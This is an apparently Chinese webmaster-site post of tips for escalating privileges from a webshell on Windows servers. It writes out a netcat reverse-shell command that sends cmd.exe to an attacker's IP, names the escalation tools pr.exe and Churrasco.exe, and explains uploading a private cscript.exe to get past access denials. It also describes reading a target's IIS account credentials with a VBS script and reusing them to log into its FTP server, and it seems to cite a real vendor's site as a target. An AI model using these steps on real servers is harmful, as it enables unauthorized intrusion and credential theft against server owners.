| webshell提權(quán)小技巧 cmd路徑: c:\windows\temp\cmd.exe nc也在同目錄下 例如反彈cmdshell: "c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe" 通常都不會(huì)成功。 而直接在 cmd路徑上 輸入 c:\windows\temp\nc.exe 命令輸入 -vv ip 999 -e c:\windows\temp\cmd.exe 卻能成功。。 這個(gè)不是重點(diǎn) 我們通常 執(zhí)行 pr.exe 或 Churrasco.exe 時(shí) 有時(shí)候也需要 按照上面的 方法才能成功。 友情檢測(cè)波爾遠(yuǎn)程控制官方網(wǎng)站 第一處:把代碼保存為1.vbs 上傳到服務(wù)器上,執(zhí)行cscript 1.vbs,又提示拒絕訪問。
其實(shí)這里,我們只要自己上傳一個(gè)cscript.exe 一般就可以解決問題,這個(gè)程序默認(rèn)位于系統(tǒng)文件夾下,是win32 控制臺(tái)下的腳本宿主引擎,用來執(zhí)行vbs 等腳本程序的。 第二處:用VBS腳本查看到目標(biāo)IIS帳號(hào)和密碼后,CMD下FTP發(fā)現(xiàn)目標(biāo)用的是微軟FTP,直接用IIS帳號(hào)和密碼登錄進(jìn)去了。 |
免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長(zhǎng)轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷服務(wù),與站長(zhǎng)一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!
掃一掃,關(guān)注站長(zhǎng)網(wǎng)微信
大家都在看
